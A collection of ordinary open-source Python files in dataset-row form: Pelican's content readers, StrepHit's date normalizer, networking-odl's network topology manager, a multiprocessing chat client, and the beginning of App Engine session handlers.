attributes: - enabled: (boolean) tell if the Reader class is enabled. It generally depends on the import of some dependency. - file_extensions: a list of file extensions that the Reader will process. - extensions: a list of extensions to use in the reader (typical use is Markdown). 
""" enabled = True file_extensions = ['static'] extensions = None def __init__(self, settings): self.settings = settings def process_metadata(self, name, value): if name in METADATA_PROCESSORS: return METADATA_PROCESSORS[name](value, self.settings) return value def read(self, source_path): "No-op parser" content = None metadata = {} return content, metadata class _FieldBodyTranslator(HTMLTranslator): def __init__(self, document): HTMLTranslator.__init__(self, document) self.compact_p = None def astext(self): return ''.join(self.body) def visit_field_body(self, node): pass def depart_field_body(self, node): pass def render_node_to_html(document, node, field_body_translator_class): visitor = field_body_translator_class(document) node.walkabout(visitor) return visitor.astext() class PelicanHTMLWriter(Writer): def __init__(self): Writer.__init__(self) self.translator_class = PelicanHTMLTranslator class PelicanHTMLTranslator(HTMLTranslator): def visit_abbreviation(self, node): attrs = {} if node.hasattr('explanation'): attrs['title'] = node['explanation'] self.body.append(self.starttag(node, 'abbr', '', **attrs)) def depart_abbreviation(self, node): self.body.append('</abbr>') def visit_image(self, node): # set an empty alt if alt is not specified # avoids that alt is taken from src node['alt'] = node.get('alt', '') return HTMLTranslator.visit_image(self, node) class RstReader(BaseReader): """Reader for reStructuredText files By default the output HTML is written using docutils.writers.html4css1.Writer and translated using a subclass of docutils.writers.html4css1.HTMLTranslator. If you want to override it with your own writer/translator (e.g. a HTML5-based one), pass your classes to these two attributes. Look in the source code for details. writer_class Used for writing contents field_body_translator_class Used for translating metadata such as article summary """ enabled = bool(docutils) file_extensions = ['rst'] writer_class = PelicanHTMLWriter field_body_translator_class = _FieldBodyTranslator class FileInput(docutils.io.FileInput): """Patch docutils.io.FileInput to remove "U" mode in py3. Universal newlines is enabled by default and "U" mode is deprecated in py3. """ def __init__(self, *args, **kwargs): if six.PY3: kwargs['mode'] = kwargs.get('mode', 'r').replace('U', '') docutils.io.FileInput.__init__(self, *args, **kwargs) def __init__(self, *args, **kwargs): super(RstReader, self).__init__(*args, **kwargs) def _parse_metadata(self, document): """Return the dict containing document metadata""" formatted_fields = self.settings['FORMATTED_FIELDS'] output = {} for docinfo in document.traverse(docutils.nodes.docinfo): for element in docinfo.children: if element.tagname == 'field': # custom fields (e.g. summary) name_elem, body_elem = element.children name = name_elem.astext() if name in formatted_fields: value = render_node_to_html( document, body_elem, self.field_body_translator_class) else: value = body_elem.astext() elif element.tagname == 'authors': # author list name = element.tagname value = [element.astext() for element in element.children] else: # standard fields (e.g. 
address) name = element.tagname value = element.astext() name = name.lower() output[name] = self.process_metadata(name, value) return output def _get_publisher(self, source_path): extra_params = {'initial_header_level': '2', 'syntax_highlight': 'short', 'input_encoding': 'utf-8', 'exit_status_level': 2, 'embed_stylesheet': False} user_params = self.settings.get('DOCUTILS_SETTINGS') if user_params: extra_params.update(user_params) pub = docutils.core.Publisher( writer=self.writer_class(), source_class=self.FileInput, destination_class=docutils.io.StringOutput) pub.set_components('standalone', 'restructuredtext', 'html') pub.process_programmatic_settings(None, extra_params, None) pub.set_source(source_path=source_path) pub.publish(enable_exit_status=True) return pub def read(self, source_path): """Parses restructured text""" pub = self._get_publisher(source_path) parts = pub.writer.parts content = parts.get('body') metadata = self._parse_metadata(pub.document) metadata.setdefault('title', parts.get('title')) return content, metadata class MarkdownReader(BaseReader): """Reader for Markdown files""" enabled = bool(Markdown) file_extensions = ['md', 'markdown', 'mkd', 'mdown'] def __init__(self, *args, **kwargs): super(MarkdownReader, self).__init__(*args, **kwargs) settings = self.settings['MARKDOWN'] settings.setdefault('extension_configs', {}) settings.setdefault('extensions', []) for extension in settings['extension_configs'].keys(): if extension not in settings['extensions']: settings['extensions'].append(extension) if 'markdown.extensions.meta' not in settings['extensions']: settings['extensions'].append('markdown.extensions.meta') self._source_path = None def _parse_metadata(self, meta): """Return the dict containing document metadata""" formatted_fields = self.settings['FORMATTED_FIELDS'] output = {} for name, value in meta.items(): name = name.lower() if name in formatted_fields: # formatted metadata is special case and join all list values formatted_values = "\n".join(value) # reset the markdown instance to clear any state self._md.reset() formatted = self._md.convert(formatted_values) output[name] = self.process_metadata(name, formatted) elif name in METADATA_PROCESSORS: if len(value) > 1: logger.warning( 'Duplicate definition of `%s` ' 'for %s. 
Using first one.', name, self._source_path) output[name] = self.process_metadata(name, value[0]) elif len(value) > 1: # handle list metadata as list of string output[name] = self.process_metadata(name, value) else: # otherwise, handle metadata as single string output[name] = self.process_metadata(name, value[0]) return output def read(self, source_path): """Parse content and metadata of markdown files""" self._source_path = source_path self._md = Markdown(**self.settings['MARKDOWN']) with pelican_open(source_path) as text: content = self._md.convert(text) if hasattr(self._md, 'Meta'): metadata = self._parse_metadata(self._md.Meta) else: metadata = {} return content, metadata class HTMLReader(BaseReader): """Parses HTML files as input, looking for meta, title, and body tags""" file_extensions = ['htm', 'html'] enabled = True class _HTMLParser(HTMLParser): def __init__(self, settings, filename): try: # Python 3.4+ HTMLParser.__init__(self, convert_charrefs=False) except TypeError: HTMLParser.__init__(self) self.body = '' self.metadata = {} self.settings = settings self._data_buffer = '' self._filename = filename self._in_top_level = True self._in_head = False self._in_title = False self._in_body = False self._in_tags = False def handle_starttag(self, tag, attrs): if tag == 'head' and self._in_top_level: self._in_top_level = False self._in_head = True elif tag == 'title' and self._in_head: self._in_title = True self._data_buffer = '' elif tag == 'body' and self._in_top_level: self._in_top_level = False self._in_body = True self._data_buffer = '' elif tag == 'meta' and self._in_head: self._handle_meta_tag(attrs) elif self._in_body: self._data_buffer += self.build_tag(tag, attrs, False) def handle_endtag(self, tag): if tag == 'head': if self._in_head: self._in_head = False self._in_top_level = True elif tag == 'title': self._in_title = False self.metadata['title'] = self._data_buffer elif tag == 'body': self.body = self._data_buffer self._in_body = False self._in_top_level = True elif self._in_body: self._data_buffer += '</{}>'.format(escape_html(tag)) def handle_startendtag(self, tag, attrs): if tag == 'meta' and self._in_head: self._handle_meta_tag(attrs) if self._in_body: self._data_buffer += self.build_tag(tag, attrs, True) def handle_comment(self, data): self._data_buffer += '<!--{}-->'.format(data) def handle_data(self, data): self._data_buffer += data def handle_entityref(self, data): self._data_buffer += '&{};'.format(data) def handle_charref(self, data): self._data_buffer += '&#{};'.format(data) def build_tag(self, tag, attrs, close_tag): result = '<{}'.format(escape_html(tag)) for k, v in attrs: result += ' ' + escape_html(k) if v is not None: # If the attribute value contains a double quote, surround # with single quotes, otherwise use double quotes. if '"' in v: result += "='{}'".format(escape_html(v, quote=False)) else: result += '="{}"'.format(escape_html(v, quote=False)) if close_tag: return result + ' />' return result + '>' def _handle_meta_tag(self, attrs): name = self._attr_value(attrs, 'name') if name is None: attr_list = ['{}="{}"'.format(k, v) for k, v in attrs] attr_serialized = ', '.join(attr_list) logger.warning("Meta tag in file %s does not have a 'name' " "attribute, skipping. 
Attributes: %s", self._filename, attr_serialized) return name = name.lower() contents = self._attr_value(attrs, 'content', '') if not contents: contents = self._attr_value(attrs, 'contents', '') if contents: logger.warning( "Meta tag attribute 'contents' used in file %s, should" " be changed to 'content'", self._filename, extra={'limit_msg': "Other files have meta tag " "attribute 'contents' that should " "be changed to 'content'"}) if name == 'keywords': name = 'tags' self.metadata[name] = contents @classmethod def _attr_value(cls, attrs, name, default=None): return next((x[1] for x in attrs if x[0] == name), default) def read(self, filename): """Parse content and metadata of HTML files""" with pelican_open(filename) as content: parser = self._HTMLParser(self.settings, filename) parser.feed(content) parser.close() metadata = {} for k in parser.metadata: metadata[k] = self.process_metadata(k, parser.metadata[k]) return parser.body, metadata class Readers(FileStampDataCacher): """Interface for all readers. This class contains a mapping of file extensions / Reader classes, to know which Reader class must be used to read a file (based on its extension). This is customizable both with the 'READERS' setting, and with the 'readers_init' signall for plugins. """ def __init__(self, settings=None, cache_name=''): self.settings = settings or {} self.readers = {} self.reader_classes = {} for cls in [BaseReader] + BaseReader.__subclasses__(): if not cls.enabled: logger.debug('Missing dependencies for %s', ', '.join(cls.file_extensions)) continue for ext in cls.file_extensions: self.reader_classes[ext] = cls if self.settings['READERS']: self.reader_classes.update(self.settings['READERS']) signals.readers_init.send(self) for fmt, reader_class in self.reader_classes.items(): if not reader_class: continue self.readers[fmt] = reader_class(self.settings) # set up caching cache_this_level = (cache_name != '' and self.settings['CONTENT_CACHING_LAYER'] == 'reader') caching_policy = cache_this_level and self.settings['CACHE_CONTENT'] load_policy = cache_this_level and self.settings['LOAD_CONTENT_CACHE'] super(Readers, self).__init__(settings, cache_name, caching_policy, load_policy, ) @property def extensions(self): return self.readers.keys() def read_file(self, base_path, path, content_class=Page, fmt=None, context=None, preread_signal=None, preread_sender=None, context_signal=None, context_sender=None): """Return a content object parsed with the given format.""" path = os.path.abspath(os.path.join(base_path, path)) source_path = posixize_path(os.path.relpath(path, base_path)) logger.debug( 'Read file %s -> %s', source_path, content_class.__name__) if not fmt: _, ext = os.path.splitext(os.path.basename(path)) fmt = ext[1:] if fmt not in self.readers: raise TypeError( 'Pelican does not know how to parse %s', path) if preread_signal: logger.debug( 'Signal %s.send(%s)', preread_signal.name, preread_sender) preread_signal.send(preread_sender) reader = self.readers[fmt] metadata = _filter_discardable_metadata(default_metadata( settings=self.settings, process=reader.process_metadata)) metadata.update(path_metadata( full_path=path, source_path=source_path, settings=self.settings)) metadata.update(_filter_discardable_metadata(parse_path_metadata( source_path=source_path, settings=self.settings, process=reader.process_metadata))) reader_name = reader.__class__.__name__ metadata['reader'] = reader_name.replace('Reader', '').lower() content, reader_metadata = self.get_cached_data(path, (None, None)) if content is None: 
content, reader_metadata = reader.read(path) self.cache_data(path, (content, reader_metadata)) metadata.update(_filter_discardable_metadata(reader_metadata)) if content: # find images with empty alt find_empty_alt(content, path) # eventually filter the content with typogrify if asked so if self.settings['TYPOGRIFY']: from typogrify.filters import typogrify import smartypants # Tell `smartypants` to also replace &quot; HTML entities with # smart quotes. This is necessary because Docutils has already # replaced double quotes with said entities by the time we run # this filter. smartypants.Attr.default |= smartypants.Attr.w def typogrify_wrapper(text): """Ensures ignore_tags feature is backward compatible""" try: return typogrify( text, self.settings['TYPOGRIFY_IGNORE_TAGS']) except TypeError: return typogrify(text) if content: content = typogrify_wrapper(content) if 'title' in metadata: metadata['title'] = typogrify_wrapper(metadata['title']) if 'summary' in metadata: metadata['summary'] = typogrify_wrapper(metadata['summary']) if context_signal: logger.debug( 'Signal %s.send(%s, <metadata>)', context_signal.name, context_sender) context_signal.send(context_sender, metadata=metadata) return content_class(content=content, metadata=metadata, settings=self.settings, source_path=path, context=context) def find_empty_alt(content, path): """Find images with empty alt Create warnings for all images with empty alt (up to a certain number), as they are really likely to be accessibility flaws. """ imgs = re.compile(r""" (?: # src before alt <img [^\>]* src=(['"])(.*?)\1 [^\>]* alt=(['"])\3 )|(?: # alt before src <img [^\>]* alt=(['"])\4 [^\>]* src=(['"])(.*?)\5 ) """, re.X) for match in re.findall(imgs, content): logger.warning( 'Empty alt attribute for image %s in %s', os.path.basename(match[1] + match[5]), path, extra={'limit_msg': 'Other images have empty alt attributes'}) def default_metadata(settings=None, process=None): metadata = {} if settings: for name, value in dict(settings.get('DEFAULT_METADATA', {})).items(): if process: value = process(name, value) metadata[name] = value if 'DEFAULT_CATEGORY' in settings: value = settings['DEFAULT_CATEGORY'] if process: value = process('category', value) metadata['category'] = value if settings.get('DEFAULT_DATE', None) and \ settings['DEFAULT_DATE'] != 'fs': if isinstance(settings['DEFAULT_DATE'], six.string_types): metadata['date'] = get_date(settings['DEFAULT_DATE']) else: metadata['date'] = SafeDatetime(*settings['DEFAULT_DATE']) return metadata def path_metadata(full_path, source_path, settings=None): metadata = {} if settings: if settings.get('DEFAULT_DATE', None) == 'fs': metadata['date'] = SafeDatetime.fromtimestamp( os.stat(full_path).st_mtime) metadata.update(settings.get('EXTRA_PATH_METADATA', {}).get( source_path, {})) return metadata def parse_path_metadata(source_path, settings=None, process=None): r"""Extract a metadata dictionary from a file's path >>> import pprint >>> settings = { ... 'FILENAME_METADATA': r'(?P<slug>[^.]*).*', ... 'PATH_METADATA': ... r'(?P<category>[^/]*)/(?P<date>\d{4}-\d{2}-\d{2})/.*', ... } >>> reader = BaseReader(settings=settings) >>> metadata = parse_path_metadata( ... source_path='my-cat/2013-01-01/my-slug.html', ... settings=settings, ... 
process=reader.process_metadata) >>> pprint.pprint(metadata) # doctest: +ELLIPSIS {'category': <pelican.urlwrappers.Category object at ...>, 'date': SafeDatetime(2013, 1, 1, 0, 0), 'slug': 'my-slug'} """ metadata = {} dirname, basename = os.path.split(source_path) base, ext = os.path.splitext(basename) subdir = os.path.basename(dirname) if settings: checks = [] for key, data in [('FILENAME_METADATA', base), ('PATH_METADATA', source_path)]: checks.append((settings.get(key, None), data)) if settings.get('USE_FOLDER_AS_CATEGORY', None): checks.append(('(?P<category>.*)', subdir)) for regexp, data in checks: if regexp and data: match = re.match(regexp, data) if match: # .items() for py3k compat. for k, v in match.groupdict().items(): k = k.lower() # metadata must be lowercase if v is not None and k not in metadata: if process: v = process(k, v) metadata[k] = v return metadata
agpl-3.0
7,005,900,722,206,514,000
35.349929
79
0.559678
false
4.298402
false
false
false
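The MarkdownReader above delegates metadata extraction to Python-Markdown's meta extension and then post-processes the resulting dict. A minimal standalone sketch of that first step, assuming the markdown package is installed (the sample text below is made up):

from markdown import Markdown

text = (
    "Title: An example post\n"
    "Tags: pelican, readers\n"
    "\n"
    "Body of the post.\n"
)

# 'markdown.extensions.meta' is the extension MarkdownReader registers by default.
md = Markdown(extensions=['markdown.extensions.meta'])
html = md.convert(text)   # rendered body
meta = md.Meta            # {'title': ['An example post'], 'tags': ['pelican, readers']}
# MarkdownReader._parse_metadata then lowercases the keys and runs each value
# through METADATA_PROCESSORS (turning 'tags' into Tag objects, dates into
# datetimes, and so on).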
Wikidata/StrepHit
strephit/commons/date_normalizer.py
1
7746
from __future__ import absolute_import import yaml import re import os import logging logger = logging.getLogger(__name__) class DateNormalizer(object): """ find matches in text strings using regular expressions and transforms them according to a pattern transformation expression evaluated on the match the specifications are given in yaml format and allow to define meta functions and meta variables as well as the pattern and transformation rules themselves. meta variables will be placed inside patterns which use them in order to make writing patterns easier. meta variables will be available to use from inside the meta functions too as a dictionary named meta_vars a pattern transformation expression is an expression which will be evaluated if the corresponding regular expression matches. the pattern transformation will have access to all the meta functions and meta variables defined and to a variable named 'match' containing the regex match found """ def __init__(self, language=None, specs=None): assert language or specs, 'please specify either one of the pre-set ' \ 'languages or provide a custom rule set' if specs is None: path = os.path.join(os.path.dirname(__file__), 'resources', 'normalization_rules_%s.yml' % language) with open(path) as f: specs = yaml.load(f) self._meta_init(specs) basic_r = {name: pattern for name, pattern in self.meta_vars.iteritems()} self.regexes = {} for category, regexes in specs.iteritems(): regexes = sum((x.items() for x in regexes), []) self.regexes[category] = [(re.compile(pattern.format(**basic_r) .replace(' ', '\\s*'), re.IGNORECASE), result) for pattern, result in regexes] def _meta_init(self, specs): """ Reads the meta variables and the meta functions from the specification :param dict specs: The specifications loaded from the file :return: None """ # read meta variables and perform substitutions self.meta_vars = {} if '__meta_vars__' in specs: for definition in specs.pop('__meta_vars__'): var, value = definition.items()[0] if isinstance(value, basestring): self.meta_vars[var] = value.format(**self.meta_vars) elif isinstance(value, dict): self.meta_vars[var] = { k: v.format(**self.meta_vars) for k, v in value.iteritems() } # compile meta functions in a dictionary self.meta_funcs = {} if '__meta_funcs__' in specs: for f in specs.pop('__meta_funcs__'): exec f in self.meta_funcs # make meta variables available to the meta functions just defined self.meta_funcs['__builtins__']['meta_vars'] = self.meta_vars self.globals = self.meta_funcs self.globals.update(self.meta_vars) def normalize_one(self, expression, conflict='longest'): """ Find the matching part in the given expression :param str expression: The expression in which to search the match :param str conflict: Whether to return the first match found or scan through all the provided regular expressions and return the longest or shortest part of the string matched by a regular expression. Note that the match will always be the first one found in the string, this parameter tells how to resolve conflicts when there is more than one regular expression that returns a match. 
When more matches have the same length the first one found counts Allowed values are `first`, `longest` and `shortest` :return: Tuple with (start, end), category, result :rtype: tuple Sample usage: >>> from strephit.commons.date_normalizer import DateNormalizer >>> DateNormalizer('en').normalize_one('Today is the 1st of June, 2016') ((13, 30), 'Time', {'month': 6, 'day': 1, 'year': 2016}) """ best_match = None expression = expression.lower() for category, regexes in self.regexes.iteritems(): for regex, transform in regexes: match = regex.search(expression) if not match: continue elif conflict == 'first': return self._process_match(category, transform, match, 0) elif best_match is None or \ conflict == 'longest' and match.end() - match.start() > best_match[1] or \ conflict == 'shortest' and match.end() - match.start() < best_match[1]: best_match = match, match.end() - match.start(), category, transform if best_match is None: return (-1, -1), None, None else: match, _, category, transform = best_match return self._process_match(category, transform, match, 0) def normalize_many(self, expression): """ Find all the matching entities in the given expression expression :param str expression: The expression in which to look for :return: Generator of tuples (start, end), category, result Sample usage: >>> from pprint import pprint >>> from strephit.commons.date_normalizer import DateNormalizer >>> pprint(list(DateNormalizer('en').normalize_many('I was born on April 18th, ' ... 'and today is April 18th, 2016!'))) [((14, 24), 'Time', {'day': 18, 'month': 4}), ((39, 55), 'Time', {'day': 18, 'month': 4, 'year': 2016})] """ # start matching from here, and move forward as new matches # are found so to avoid overlapping matches and return # the correct offset inside the original sentence position = 0 expression = expression.lower() for category, regexes in self.regexes.iteritems(): for regex, transform in regexes: end = 0 for match in regex.finditer(expression[position:]): yield self._process_match(category, transform, match, position) end = max(end, match.end()) position += end def _process_match(self, category, transform, match, first_position): result = eval(transform, self.globals, {'match': match}) start, end = match.span() return (first_position + start, first_position + end), category, result NORMALIZERS = {} def normalize_numerical_fes(language, text): """ Normalize numerical FEs in a sentence """ if language not in NORMALIZERS: NORMALIZERS[language] = DateNormalizer(language) normalizer = NORMALIZERS[language] logger.debug('labeling and normalizing numerical FEs of language %s...', language) count = 0 for (start, end), tag, norm in normalizer.normalize_many(text): chunk = text[start:end] logger.debug('Chunk [%s] normalized into [%s], tagged as [%s]' % (chunk, norm, tag)) # All numerical FEs are extra ones and their values are literals fe = { 'fe': tag, 'chunk': chunk, 'type': 'extra', 'literal': norm, 'score': 1.0 } count += 1 yield fe logger.debug('found %d numerical FEs into "%s"', count, text)
gpl-3.0
4,360,993,509,104,244,700
41.097826
98
0.590627
false
4.64946
false
false
false
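The DateNormalizer above can also be driven by a custom rule set instead of one of the bundled YAML files. A rough sketch, assuming a Python 2 runtime (the module uses iteritems, basestring and the exec statement); the category name, pattern and meta function below are invented for illustration, and braces are avoided in the pattern because every pattern is passed through str.format before compilation:

from strephit.commons.date_normalizer import DateNormalizer

specs = {
    # optional helpers compiled with exec and made available to transformations
    '__meta_funcs__': [
        'def to_int(value): return int(value)',
    ],
    # each category maps to a list of one-entry dicts {regex: expression};
    # the expression is evaluated with the regex match object in scope
    'Time': [
        {'(?P<y>[0-9][0-9][0-9][0-9])': "{'year': to_int(match.group('y'))}"},
    ],
}

normalizer = DateNormalizer(specs=specs)
print normalizer.normalize_one('born in 1999')
# expected: ((8, 12), 'Time', {'year': 1999})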
FedericoRessi/networking-odl
networking_odl/ml2/network_topology.py
1
12691
# Copyright (c) 2015-2016 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import importlib import logging import six from six.moves.urllib import parse from neutron.extensions import portbindings from oslo_log import log from oslo_serialization import jsonutils from networking_odl.common import cache from networking_odl.common import client from networking_odl.common import utils from networking_odl.common._i18n import _LI, _LW, _LE LOG = log.getLogger(__name__) class NetworkTopologyManager(object): # the first valid vif type will be chosed following the order # on this list. This list can be modified to adapt to user preferences. valid_vif_types = [ portbindings.VIF_TYPE_VHOST_USER, portbindings.VIF_TYPE_OVS] # List of class names of registered implementations of interface # NetworkTopologyParser network_topology_parsers = [ 'networking_odl.ml2.ovsdb_topology.OvsdbNetworkTopologyParser'] def __init__(self, vif_details=None, client=None): # Details for binding port self._vif_details = vif_details or {} # Rest client used for getting network topology from ODL self._client = client or NetworkTopologyClient.create_client() # Table of NetworkTopologyElement self._elements_by_ip = cache.Cache( self._fetch_and_parse_network_topology) # Parsers used for processing network topology self._parsers = list(self._create_parsers()) def bind_port(self, port_context): """Set binding for a valid segment """ host_name = port_context.host elements = list() try: # Append to empty list to add as much elements as possible # in the case it raises an exception elements.extend(self._fetch_elements_by_host(host_name)) except Exception: LOG.exception( _LE('Error fetching elements for host %(host_name)r.'), {'host_name': host_name}, exc_info=1) if not elements: # In case it wasn't able to find any network topology element # for given host then it uses the legacy OVS one keeping the old # behaviour LOG.warning( _LW('Using legacy OVS network topology element for port ' 'binding for host: %(host_name)r.'), {'host_name': host_name}) # Imported here to avoid cyclic module dependencies from networking_odl.ml2 import ovsdb_topology elements = [ovsdb_topology.OvsdbNetworkTopologyElement()] # TODO(Federico Ressi): in the case there are more candidate virtual # switches instances for the same host it choses one for binding # port. As there isn't any know way to perform this selection it # selects a VIF type that is valid for all switches that have # been found and a VIF type valid for all them. 
This has to be improved for vif_type in self.valid_vif_types: vif_type_is_valid_for_all = True for element in elements: if vif_type not in element.valid_vif_types: # it is invalid for at least one element: discard it vif_type_is_valid_for_all = False break if vif_type_is_valid_for_all: # This is the best VIF type valid for all elements LOG.debug( "Found VIF type %(vif_type)r valid for all network " "topology elements for host %(host_name)r.", {'vif_type': vif_type, 'host_name': host_name}) for element in elements: # It assumes that any element could be good for given host # In most of the cases I expect exactely one element for # every compute host try: return element.bind_port( port_context, vif_type, self._vif_details) except Exception: LOG.exception( _LE('Network topology element has failed binding ' 'port:\n%(element)s'), {'element': element.to_json()}) LOG.error( _LE('Unable to bind port element for given host and valid VIF ' 'types:\n' '\thostname: %(host_name)s\n' '\tvalid VIF types: %(valid_vif_types)s'), {'host_name': host_name, 'valid_vif_types': ', '.join(self.valid_vif_types)}) # TDOO(Federico Ressi): should I raise an exception here? def _create_parsers(self): for parser_name in self.network_topology_parsers: try: yield NetworkTopologyParser.create_parser(parser_name) except Exception: LOG.exception( _LE('Error initializing topology parser: %(parser_name)r'), {'parser_name': parser_name}) def _fetch_elements_by_host(self, host_name, cache_timeout=60.0): '''Yields all network topology elements referring to given host name ''' host_addresses = [host_name] try: # It uses both compute host name and known IP addresses to # recognize topology elements valid for given computed host ip_addresses = utils.get_addresses_by_name(host_name) except Exception: ip_addresses = [] LOG.exception( _LE('Unable to resolve IP addresses for host %(host_name)r'), {'host_name': host_name}) else: host_addresses.extend(ip_addresses) yield_elements = set() try: for _, element in self._elements_by_ip.fetch_all( host_addresses, cache_timeout): # yields every element only once if element not in yield_elements: yield_elements.add(element) yield element except cache.CacheFetchError as error: # This error is expected on most of the cases because typically not # all host_addresses maps to a network topology element. if yield_elements: # As we need only one element for every host we ignore the # case in which others host addresseses didn't map to any host LOG.debug( 'Host addresses not found in networking topology: %s', ', '.join(error.missing_keys)) else: LOG.exception( _LE('No such network topology elements for given host ' '%(host_name)r and given IPs: %(ip_addresses)s.'), {'host_name': host_name, 'ip_addresses': ", ".join(ip_addresses)}) error.reraise_cause() def _fetch_and_parse_network_topology(self, addresses): # The cache calls this method to fecth new elements when at least one # of the addresses is not in the cache or it has expired. 
# pylint: disable=unused-argument LOG.info(_LI('Fetch network topology from ODL.')) response = self._client.get() response.raise_for_status() network_topology = response.json() if LOG.isEnabledFor(logging.DEBUG): topology_str = jsonutils.dumps( network_topology, sort_keys=True, indent=4, separators=(',', ': ')) LOG.debug("Got network topology:\n%s", topology_str) at_least_one_element_for_asked_addresses = False for parser in self._parsers: try: for element in parser.parse_network_topology(network_topology): if not isinstance(element, NetworkTopologyElement): raise TypeError( "Yield element doesn't implement interface " "'NetworkTopologyElement': {!r}".format(element)) # the same element can be known by more host addresses for host_address in element.host_addresses: if host_address in addresses: at_least_one_element_for_asked_addresses = True yield host_address, element except Exception: LOG.exception( _LE("Parser %(parser)r failed to parse network topology."), {'parser': parser}) if not at_least_one_element_for_asked_addresses: # this will mark entries for given addresses as failed to allow # calling this method again as soon it is requested and avoid # waiting for cache expiration raise ValueError( 'No such topology element for given host addresses: {}'.format( ', '.join(addresses))) @six.add_metaclass(abc.ABCMeta) class NetworkTopologyParser(object): @classmethod def create_parser(cls, parser_class_name): '''Creates a 'NetworkTopologyParser' of given class name. ''' module_name, class_name = parser_class_name.rsplit('.', 1) module = importlib.import_module(module_name) clss = getattr(module, class_name) if not issubclass(clss, cls): raise TypeError( "Class {class_name!r} of module {module_name!r} doesn't " "implement 'NetworkTopologyParser' interface.".format( class_name=class_name, module_name=module_name)) return clss() @abc.abstractmethod def parse_network_topology(self, network_topology): '''Parses OpenDaylight network topology Yields all network topology elements implementing 'NetworkTopologyElement' interface found in given network topology. ''' @six.add_metaclass(abc.ABCMeta) class NetworkTopologyElement(object): @abc.abstractproperty def host_addresses(self): '''List of known host addresses of a single compute host Either host names and ip addresses are valid. Neutron host controller must know at least one of these compute host names or ip addresses to find this element. ''' @abc.abstractproperty def valid_vif_types(self): '''Returns a tuple listing VIF types supported by the compute node ''' @abc.abstractmethod def bind_port(self, port_context, vif_type, vif_details): '''Bind port context using given vif type and vit details This method is expected to search for a valid segment and then call following method: from neutron.common import constants from neutron.plugins.ml2 import driver_api port_context.set_binding( valid_segment[driver_api.ID], vif_type, vif_details, status=constants.PORT_STATUS_ACTIVE) ''' def to_dict(self): cls = type(self) return { 'class': cls.__module__ + '.' 
+ cls.__name__, 'host_addresses': list(self.host_addresses), 'valid_vif_types': list(self.valid_vif_types)} def to_json(self): return jsonutils.dumps( self.to_dict(), sort_keys=True, indent=4, separators=(',', ': ')) class NetworkTopologyClient(client.OpenDaylightRestClient): _GET_ODL_NETWORK_TOPOLOGY_URL =\ 'restconf/operational/network-topology:network-topology' def __init__(self, url, username, password, timeout): if url: url = parse.urlparse(url) port = '' if url.port: port = ':' + str(url.port) topology_url = '{}://{}{}/{}'.format( url.scheme, url.hostname, port, self._GET_ODL_NETWORK_TOPOLOGY_URL) else: topology_url = None super(NetworkTopologyClient, self).__init__( topology_url, username, password, timeout)
apache-2.0
132,776,603,059,931,380
38.659375
79
0.588527
false
4.560187
false
false
false
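NetworkTopologyManager discovers parsers by dotted class path (see create_parser above), so plugging in an additional topology format amounts to subclassing NetworkTopologyParser and registering that path. A sketch; the module path and class name are hypothetical and the parser body is a stub:

from networking_odl.ml2 import network_topology

class MyTopologyParser(network_topology.NetworkTopologyParser):
    """Hypothetical parser for an additional switch type."""

    def parse_network_topology(self, topology):
        # `topology` is the JSON document fetched by NetworkTopologyClient.
        # A real parser would yield NetworkTopologyElement instances here,
        # e.g. one element per switch found in the document.
        return iter([])

# Registration is by dotted path; NetworkTopologyManager imports the class at
# startup and verifies that it subclasses NetworkTopologyParser.
network_topology.NetworkTopologyManager.network_topology_parsers.append(
    'my_plugin.topology.MyTopologyParser')  # hypothetical path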
tayebzaidi/PPLL_Spr_16
chat/client3.py
1
1260
from multiprocessing.connection import Client from random import random from time import sleep from multiprocessing.connection import Listener from multiprocessing import Process local_listener = (('127.0.0.1', 5003),'secret client 3 password') def client_listener(): cl = Listener(address=local_listener[0], authkey=local_listener[1]) print '.............client listener starting' print '.............accepting conexions' while True: conn = cl.accept() print '.............connection accepted from', cl.last_accepted m = conn.recv() print '.............message received from server', m if __name__ == '__main__': print 'trying to connect' conn = Client(address=('127.0.0.1', 6000), authkey='secret password server') conn.send(local_listener) cl = Process(target=client_listener, args=()) cl.start() connected = True while connected: value = raw_input("'C', stay connected. 'Q' quit connection") if value == 'Q': connected = False else: print "continue connected" conn.send("connected") print "last message" conn.send("quit") conn.close() cl.terminate() print "end client"
gpl-3.0
7,113,699,005,899,186,000
28.302326
80
0.605556
false
4.090909
false
false
false
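client3.py above expects a server listening on 127.0.0.1:6000 with authkey 'secret password server'; the client first sends its own (address, authkey) pair so the server can push messages back. A matching server sketch in the same Python 2 style (untested, handles a single client):

from multiprocessing.connection import Listener, Client

server = Listener(address=('127.0.0.1', 6000), authkey='secret password server')
conn = server.accept()

# First message from the client is its listener address and authkey.
client_address, client_authkey = conn.recv()

# Reverse channel towards the client listener process; the client starts that
# listener just after connecting, so a short retry loop may be needed here.
back = Client(address=client_address, authkey=client_authkey)
back.send('welcome, client 3')

# Read status messages until the client quits.
while True:
    message = conn.recv()
    print 'server received:', message
    if message == 'quit':
        break

conn.close()
back.close()
server.close()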
laalaguer/gae-blog-module
gaesession/handlers.py
1
7633
import webapp2 from webapp2_extras import sessions class MainHandler(webapp2.RequestHandler): def get(self): # Session is stored on both client browser and our database session_1 = self.session_store.get_session(name='dbcookie',backend='datastore') previous_value_1 = session_1.get("my_attr_name") self.response.out.write('on db, ' + str(previous_value_1)) session_1["my_attr_name"] = "Hi! " + (previous_value_1 if previous_value_1 else "") self.response.out.write('<br>') # Session is stored on client browser only session_2 = self.session_store.get_session(name='clientcookie') previous_value_2 = session_2.get('my_attr_name') self.response.out.write('on client browser, ' + str(previous_value_2)) session_2['my_attr_name'] = "Hi! " + (previous_value_2 if previous_value_2 else "") self.response.out.write('<br>') # Session is stored on both client browser and our memcache for fast access session_3 = self.session_store.get_session(name='memcachecookie',backend="memcache") previous_value_3 = session_3.get('my_attr_name') self.response.out.write('on memcache, ' + str(previous_value_3)) session_3['my_attr_name'] = "Hi! " + (previous_value_3 if previous_value_3 else "") # this is needed for webapp2 sessions to work def dispatch(self): # Get a session store for this request. self.session_store = sessions.get_store(request=self.request) try: webapp2.RequestHandler.dispatch(self) finally: # Save all sessions. self.session_store.save_sessions(self.response) class MainHandlerWithArguments(webapp2.RequestHandler): def get(self, 